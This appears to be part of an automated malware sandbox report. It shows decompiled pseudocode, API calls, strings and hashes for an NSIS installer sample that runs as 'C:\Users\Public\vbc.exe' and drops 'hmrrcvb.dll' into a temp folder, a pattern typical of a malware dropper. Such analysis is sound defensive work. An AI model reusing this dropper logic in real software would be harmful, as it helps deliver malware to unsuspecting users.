              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
              • String ID: "C:\Users\Public\vbc.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$TclpOwkq$_Nb$`MP
              • API String ID: 1975747703-3183761240
              • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
              • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
              • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
              • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			E00402C55(void* __eflags, signed int _a4) {
              				DWORD* _v8;
              				DWORD* _v12;
              				void* _v16;
              				intOrPtr _v20;
              				long _v24;
              				intOrPtr _v28;
              				intOrPtr _v32;
              				intOrPtr _v36;
              				intOrPtr _v40;
              				signed int _v44;
              				long _t43;
              				signed int _t50;
              				void* _t53;
              				signed int _t54;
              				void* _t57;
              				intOrPtr* _t59;
              				long _t60;
              				signed int _t65;
              				signed int _t67;
              				signed int _t70;
              				signed int _t71;
              				signed int _t77;
              				intOrPtr _t80;
              				long _t82;
              				signed int _t85;
              				signed int _t87;
              				void* _t89;
              				signed int _t90;
              				signed int _t93;
              				void* _t94;
              
              				_t82 = 0;
              				_v12 = 0;
              				_v8 = 0;
              				_t43 = GetTickCount();
              				_t91 = "C:\\Users\\Public\\vbc.exe";
              				 *0x42ec2c = _t43 + 0x3e8;
              				GetModuleFileNameA(0, "C:\\Users\\Public\\vbc.exe", 0x400);
              				_t89 = E0040589E(_t91, 0x80000000, 3);
              				_v16 = _t89;
              				 *0x409014 = _t89;
              				if(_t89 == 0xffffffff) {
              					return "Error launching installer";
              				}
              				_t92 = "C:\\Users\\Public";
              				E00405BC7("C:\\Users\\Public", _t91);
              				E00405BC7(0x436000, E00405701(_t92));
              				_t50 = GetFileSize(_t89, 0);
              				__eflags = _t50;
              				 *0x428c50 = _t50;
              				_t93 = _t50;
              				if(_t50 <= 0) {
              					L24:
              					E00402BF1(1);
              					__eflags =  *0x42ec34 - _t82; // 0x8800
              					if(__eflags == 0) {
              						goto L29;
              					}
              					__eflags = _v8 - _t82;
              					if(_v8 == _t82) {
              						L28:
              						_t53 = GlobalAlloc(0x40, _v24); // executed
              						_t94 = _t53;
              						_t54 =  *0x42ec34; // 0x8800
              						E004030E2(_t54 + 0x1c);
              						_push(_v24);
              						_push(_t94);
              						_push(_t82);
              						_push(0xffffffff); // executed
              						_t57 = E00402E8E(); // executed
              						__eflags = _t57 - _v24;
              						if(_t57 == _v24) {
              							__eflags = _v44 & 0x00000001;
              							 *0x42ec30 = _t94;
              							 *0x42ec38 =  *_t94;
              							if((_v44 & 0x00000001) != 0) {
              								 *0x42ec3c =  *0x42ec3c + 1;
              								__eflags =  *0x42ec3c;
              							}
              							_t40 = _t94 + 0x44; // 0x44
              							_t59 = _t40;
              							_t85 = 8;
              							do {
              								_t59 = _t59 - 8;
              								 *_t59 =  *_t59 + _t94;
              								_t85 = _t85 - 1;
              								__eflags = _t85;
              							} while (_t85 != 0);
              							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
              							 *(_t94 + 0x3c) = _t60;
              							E0040585F(0x42ec40, _t94 + 4, 0x40);
              							__eflags = 0;
              							return 0;
              						}
              						goto L29;
              					}
              					E004030E2( *0x414c40);
              					_t65 = E004030B0( &_a4, 4);
              					__eflags = _t65;
              					if(_t65 == 0) {
              						goto L29;
              					}
              					__eflags = _v12 - _a4;
              					if(_v12 != _a4) {
              						goto L29;
              					}
              					goto L28;
              				} else {
              					do {
              						_t67 =  *0x42ec34; // 0x8800
              						_t90 = _t93;
              						asm("sbb eax, eax");
              						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
              						__eflags = _t93 - _t70;
              						if(_t93 >= _t70) {
              							_t90 = _t70;
              						}
              						_t71 = E004030B0(0x420c50, _t90); // executed
              						__eflags = _t71;
              						if(_t71 == 0) {
              							E00402BF1(1);
              							L29:
              							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
              						}
              						__eflags =  *0x42ec34;
              						if( *0x42ec34 != 0) {
              							__eflags = _a4 & 0x00000002;
              							if((_a4 & 0x00000002) == 0) {
              								E00402BF1(0);
              							}
              							goto L20;
              						}
              						E0040585F( &_v44, 0x420c50, 0x1c);
              						_t77 = _v44;
              						__eflags = _t77 & 0xfffffff0;
              						if((_t77 & 0xfffffff0) != 0) {
              							goto L20;
              						}
              						__eflags = _v40 - 0xdeadbeef;
              						if(_v40 != 0xdeadbeef) {
              							goto L20;
              						}
              						__eflags = _v28 - 0x74736e49;
              						if(_v28 != 0x74736e49) {
              							goto L20;
              						}
              						__eflags = _v32 - 0x74666f73;
              						if(_v32 != 0x74666f73) {
              							goto L20;
              						}
              						__eflags = _v36 - 0x6c6c754e;
              						if(_v36 != 0x6c6c754e) {
              							goto L20;
              						}
              						_a4 = _a4 | _t77;
              						_t87 =  *0x414c40; // 0x8800
              						 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
              						_t80 = _v20;
              						__eflags = _t80 - _t93;
              						 *0x42ec34 = _t87;
              						if(_t80 > _t93) {
              							goto L29;
              						}
              						__eflags = _a4 & 0x00000008;
              						if((_a4 & 0x00000008) != 0) {
              							L16:
              							_v8 = _v8 + 1;
              							_t93 = _t80 - 4;
              							__eflags = _t90 - _t93;
              							if(_t90 > _t93) {
              								_t90 = _t93;
              							}
              							goto L20;
              						}
              						__eflags = _a4 & 0x00000004;
              						if((_a4 & 0x00000004) != 0) {
              							break;
              						}
              						goto L16;
              						L20:
              						__eflags = _t93 -  *0x428c50;
              						if(_t93 <  *0x428c50) {
              							_v12 = E00405FC6(_v12, 0x420c50, _t90);
              						}
              						 *0x414c40 =  *0x414c40 + _t90;
              						_t93 = _t93 - _t90;
              						__eflags = _t93;
              					} while (_t93 > 0);
              					_t82 = 0;
              					__eflags = 0;
              					goto L24;
              				}
              			}


              APIs
              • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,?,00000000), ref: 00402C66
              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\vbc.exe,00000400), ref: 00402C82
                • Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\Public\vbc.exe,80000000,00000003), ref: 004058A2
                • Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
              • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\Public,C:\Users\Public,C:\Users\Public\vbc.exe,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00402CCE
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: File$AttributesCountCreateModuleNameSizeTick
              • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$`MP$soft
              • API String ID: 4283519449-4136657431
              • Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
              • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
              • Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
              • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 95%
              			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
              				signed int _v8;
              				long _v12;
              				void* _v16;
              				long _v20;
              				long _v24;
              				intOrPtr _v28;
              				char _v92;
              				void* _t67;
              				void* _t68;
              				long _t74;
              				intOrPtr _t79;
              				long _t80;
              				void* _t82;
              				int _t84;
              				intOrPtr _t95;
              				void* _t97;
              				void* _t100;
              				long _t101;
              				signed int _t102;
              				long _t103;
              				int _t104;
              				intOrPtr _t105;
              				long _t106;
              				void* _t107;
              
              				_t102 = _a16;
              				_t97 = _a12;
              				_v12 = _t102;
              				if(_t97 == 0) {
              					_v12 = 0x8000;
              				}
              				_v8 = _v8 & 0x00000000;
              				_v16 = _t97;
              				if(_t97 == 0) {
              					_v16 = 0x418c48;
              				}
              				_t65 = _a4;
              				if(_a4 >= 0) {
              					_t95 =  *0x42ec78; // 0xa137
              					E004030E2(_t95 + _t65);
              				}
              				_t67 = E004030B0( &_a16, 4); // executed
              				if(_t67 == 0) {
              					L34:
              					_push(0xfffffffd);
              					goto L35;
              				} else {
              					if((_a19 & 0x00000080) == 0) {
              						if(_t97 == 0) {
              							while(_a16 > 0) {
              								_t103 = _v12;
              								if(_a16 < _t103) {
              									_t103 = _a16;
              								}
              								if(E004030B0(0x414c48, _t103) == 0) {
              									goto L34;
              								} else {
              									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
              										L29:
              										_push(0xfffffffe);
              										L35:
              										_pop(_t68);
              										return _t68;
              									} else {
              										_v8 = _v8 + _t103;
              										_a16 = _a16 - _t103;
              										continue;
              									}
              								}
              							}
              							L45:
              							return _v8;
              						}
              						if(_a16 < _t102) {
              							_t102 = _a16;
              						}
              						if(E004030B0(_t97, _t102) != 0) {
              							_v8 = _t102;
              							goto L45;
              						} else {
              							goto L34;
              						}
              					}
              					_t74 = GetTickCount();
              					 *0x40b5ac =  *0x40b5ac & 0x00000000;
              					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
              					_t14 =  &_a16;
              					 *_t14 = _a16 & 0x7fffffff;
              					_v20 = _t74;
              					 *0x40b090 = 8;
              					 *0x414c38 = 0x40cc30;
              					 *0x414c34 = 0x40cc30;
              					 *0x414c30 = 0x414c30;
              					_a4 = _a16;
              					if( *_t14 <= 0) {
              						goto L45;
              					} else {
              						goto L9;
              					}
              					while(1) {
              						L9:
              						_t104 = 0x4000;
              						if(_a16 < 0x4000) {
              							_t104 = _a16;
              						}
              						if(E004030B0(0x414c48, _t104) == 0) {
              							goto L34;
              						}
              						_a16 = _a16 - _t104;
              						 *0x40b080 = 0x414c48;
              						 *0x40b084 = _t104;
              						while(1) {
              							_t100 = _v16;
              							 *0x40b088 = _t100;
              							 *0x40b08c = _v12;
              							_t79 = E00406034("JUA");
              							_v28 = _t79;
              							if(_t79 < 0) {
              								break;
              							}
              							_t105 =  *0x40b088; // 0x41a276
              							_t106 = _t105 - _t100;
              							_t80 = GetTickCount();
              							_t101 = _t80;
              							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
              								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
              								_t107 = _t107 + 0xc;
              								E00404EB3(0,  &_v92);
              								_v20 = _t101;
              							}
              							if(_t106 == 0) {
              								if(_a16 > 0) {
              									goto L9;
              								}
              								goto L45;
              							} else {
              								if(_a12 != 0) {
              									_t82 =  *0x40b088; // 0x41a276
              									_v8 = _v8 + _t106;
              									_v12 = _v12 - _t106;
              									_v16 = _t82;
              									L24:
              									if(_v28 != 1) {
              										continue;
              									}
              									goto L45;
              								}
              								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
              								if(_t84 == 0 || _v24 != _t106) {
              									goto L29;
              								} else {
              									_v8 = _v8 + _t106;
              									goto L24;
              								}
              							}
              						}
              						_push(0xfffffffc);
              						goto L35;
              					}
              					goto L34;
              				}
              			}

              0x00402f5f
              0x00402f62
              0x00402f68
              0x00402f6e
              0x00402f6e
              0x00402f79
              0x00402f7f
              0x00402f84
              0x00402f8b
              0x00402f8e
              0x00000000
              0x00000000
              0x00402f94
              0x00402f9a
              0x00402f9c
              0x00402fa5
              0x00402fa7
              0x00402fd5
              0x00402fdb
              0x00402fe4
              0x00402fe9
              0x00402fe9
              0x00402ff0
              0x00403034
              0x00000000
              0x00000000
              0x00000000
              0x00402ff2
              0x00402ff5
              0x00403017
              0x0040301c
              0x0040301f
              0x00403022
              0x00403025
              0x00403029
              0x00000000
              0x00000000
              0x00000000
              0x0040302f
              0x00403003
              0x0040300b
              0x00000000
              0x00403012
              0x00403012
              0x00000000
              0x00403012
              0x0040300b
              0x00402ff0
              0x0040303c
              0x00000000
              0x0040303c
              0x00000000
              0x00402f3e

              APIs
              • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EF5
              • GetTickCount.KERNEL32(JUA,00414C48,00004000), ref: 00402F9C
              • MulDiv.KERNEL32 ref: 00402FC5
              • wsprintfA.USER32 ref: 00402FD5
              • WriteFile.KERNELBASE(00000000,00000000,0041A276,7FFFFFFF,00000000), ref: 00403003
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: CountTick$FileWritewsprintf
              • String ID: %p, %u, %s, %p stub.$... %d%%$HLA$HLA$JUA
              • API String ID: 4209647438-634499494
              • Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
              • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
              • Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
              • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 73%
              			E00401751(FILETIME* __ebx, void* __eflags) {
              				void* _t33;
              				void* _t41;
              				void* _t43;
              				FILETIME* _t49;
              				FILETIME* _t62;
              				void* _t64;
              				signed int _t70;
              				FILETIME* _t71;
              				FILETIME* _t75;
              				signed int _t77;
              				void* _t80;
              				CHAR* _t82;
              				void* _t85;
              
              				_t75 = __ebx;
              				_t82 = E00402A29(0x31);
              				 *(_t85 - 0xc) = _t82;
              				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
              				_t33 = E00405727(_t82);
              				_push(_t82);
              				if(_t33 == 0) {
              					lstrcatA(E004056BA(E00405BC7(0x409c40, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
              				} else {
              					_push(0x409c40);
              					E00405BC7();
              				}
              				E00405E29(0x409c40);
              				while(1) {
              					__eflags =  *(_t85 + 8) - 3;
              					if( *(_t85 + 8) >= 3) {
              						_t64 = E00405EC2(0x409c40);
              						_t77 = 0;
              						__eflags = _t64 - _t75;
              						if(_t64 != _t75) {
              							_t71 = _t64 + 0x14;
              							__eflags = _t71;
              							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
              						}
              						asm("sbb eax, eax");
              						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
              						__eflags = _t70;
              						 *(_t85 + 8) = _t70;
              					}
              					__eflags =  *(_t85 + 8) - _t75;
              					if( *(_t85 + 8) == _t75) {
              						E0040587F(0x409c40);
              					}
              					__eflags =  *(_t85 + 8) - 1;
              					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
              					__eflags = _t41 - 0xffffffff;
              					 *(_t85 - 8) = _t41;
              					if(_t41 != 0xffffffff) {
              						break;
              					}
              					__eflags =  *(_t85 + 8) - _t75;
              					if( *(_t85 + 8) != _t75) {
              						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
              						__eflags =  *(_t85 + 8) - 2;
              						if(__eflags == 0) {
              							 *((intOrPtr*)(_t85 - 4)) = 1;
              						}
              						L31:
              						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
              						__eflags =  *0x42eca8;
              						goto L32;
              					} else {
              						E00405BC7(0x40a440, 0x42f000);
              						E00405BC7(0x42f000, 0x409c40);
              						E00405BE9(_t75, 0x40a440, 0x409c40, "C:\Users\Albus\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll",  *((intOrPtr*)(_t85 - 0x14)));
              						E00405BC7(0x42f000, 0x40a440);
              						_t62 = E00405488("C:\Users\Albus\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll",  *(_t85 - 0x28) >> 3) - 4;
              						__eflags = _t62;
              						if(_t62 == 0) {
              							continue;
              						} else {
              							__eflags = _t62 == 1;
              							if(_t62 == 1) {
              								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
              								L32:
              								_t49 = 0;
              								__eflags = 0;
              							} else {
              								_push(0x409c40);
              								_push(0xfffffffa);
              								E00404EB3();
              								L29:
              								_t49 = 0x7fffffff;
              							}
              						}
              					}
              					L33:
              					return _t49;
              				}
              				E00404EB3(0xffffffea,  *(_t85 - 0xc));
              				 *0x42ecd4 =  *0x42ecd4 + 1;
              				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
              				 *0x42ecd4 =  *0x42ecd4 - 1;
              				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
              				_t80 = _t43;
              				if( *(_t85 - 0x1c) != 0xffffffff) {
              					L22:
              					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
              				} else {
              					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
              					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
              						goto L22;
              					}
              				}
              				CloseHandle( *(_t85 - 8)); // executed
              				__eflags = _t80 - _t75;
              				if(_t80 >= _t75) {
              					goto L31;
              				} else {
              					__eflags = _t80 - 0xfffffffe;
              					if(_t80 != 0xfffffffe) {
              						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee);
              					} else {
              						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9);
              						lstrcatA(0x409c40,  *(_t85 - 0xc));
              					}
              					_push(0x200010);
              					_push(0x409c40);
              					E00405488();
              					goto L29;
              				}
              				goto L33;
              			}

              APIs
              • lstrcatA.KERNEL32(00000000,00000000,TclpOwkq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
              • CompareFileTime.KERNEL32(-00000014,?,TclpOwkq,TclpOwkq,00000000,00000000,TclpOwkq,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,qghopzytl Setup,NSIS Error), ref: 00405BD4
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041A276,74EC110C,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041A276,74EC110C,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041A276,74EC110C), ref: 00404F0F
                • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsd99E0.tmp$C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll$TclpOwkq
              • API String ID: 1941528284-2471865927
              • Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
              • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
              • Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
              • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405375(CHAR* _a4) {
              				struct _SECURITY_ATTRIBUTES _v16;
              				struct _SECURITY_DESCRIPTOR _v36;
              				int _t22;
              				long _t23;
              
              				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
              				_v36.Owner = 0x40735c;
              				_v36.Group = 0x40735c;
              				_v36.Sacl = _v36.Sacl & 0x00000000;
              				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
              				_v16.lpSecurityDescriptor =  &_v36;
              				_v36.Revision = 1;
              				_v36.Control = 4;
              				_v36.Dacl = 0x40734c;
              				_v16.nLength = 0xc;
              				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
              				if(_t22 != 0) {
              					L1:
              					return 0;
              				}
              				_t23 = GetLastError();
              				if(_t23 == 0xb7) {
              					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
              						goto L1;
              					}
              					return GetLastError();
              				}
              				return _t23;
              			}

              APIs
              • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
              • GetLastError.KERNEL32 ref: 004053CC
              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053E1
              • GetLastError.KERNEL32 ref: 004053EB
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: ErrorLast$CreateDirectoryFileSecurity
              • String ID: C:\Users\Public$Ls@$\s@
              • API String ID: 3449924974-3509358640
              • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
              • Instruction ID: 9862b429919ab471ad7b2dc8692991af43e8f75a2b46e14c68af8680499b7529
              • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
              • Instruction Fuzzy Hash: 78010C71D14219DADF019BA0DC447EFBFB8EB04354F00453AE904B6180E3B89614CFA9
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405EE9(intOrPtr _a4) {
              				char _v292;
              				int _t10;
              				struct HINSTANCE__* _t14;
              				void* _t16;
              				void* _t21;
              
              				_t10 = GetSystemDirectoryA( &_v292, 0x104);
              				if(_t10 > 0x104) {
              					_t10 = 0;
              				}
              				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
              					_t16 = 1;
              				} else {
              					_t16 = 0;
              				}
              				_t5 = _t16 + 0x409010; // 0x5c
              				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
              				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
              				return _t14;
              			}

              APIs
              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
              • wsprintfA.USER32 ref: 00405F39
              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: DirectoryLibraryLoadSystemwsprintf
              • String ID: %s%s.dll$UXTHEME$\
              • API String ID: 2200240437-4240819195
              • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
              • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
              • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
              • Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
              				signed int _t11;
              				int _t14;
              				signed int _t16;
              				void* _t19;
              				CHAR* _t20;
              
              				_t20 = _a4;
              				_t19 = 0x64;
              				while(1) {
              					_t19 = _t19 - 1;
              					_a4 = 0x61736e;
              					_t11 = GetTickCount();
              					_t16 = 0x1a;
              					_a6 = _a6 + _t11 % _t16;
              					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
              					if(_t14 != 0) {
              						break;
              					}
              					if(_t19 != 0) {
              						continue;
              					}
              					 *_t20 =  *_t20 & 0x00000000;
              					return _t14;
              				}
              				return _t20;
              			}

              APIs
              • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,00403128,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004058E0
              • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004058FA
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: CountFileNameTempTick
              • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
              • API String ID: 1716503409-1498418707
              • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
              • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
              • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
